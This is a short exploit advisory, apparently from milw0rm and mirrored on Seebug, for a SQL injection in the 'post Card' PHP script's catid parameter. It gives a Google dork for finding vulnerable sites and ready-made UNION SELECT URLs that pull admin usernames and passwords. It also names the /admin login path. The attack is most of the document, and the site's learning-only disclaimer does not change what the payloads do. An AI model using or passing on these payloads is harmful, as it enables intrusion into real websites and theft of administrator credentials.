post Card ( catid ) Remote SQL Injection Vulnerability ___________________________________ Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc MaiL : darkangeL_G85@Yahoo.CoM ___________________________________ script : http://webbdomain.com/php/postcarden/index2.php script : http://webbdomain.com/php/postcardir/index2.php DorK : inurl:choosecard.php?catid= _____ ExploiT & Demo _______ post Card v 1.01 http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- post Card v 1.02 http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- Note : Exploit in Properties Picture Login : ______ /admin Greetz : All my freind Im IraQi | Im TrYaGi # milw0rm.com [2008-11-04]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论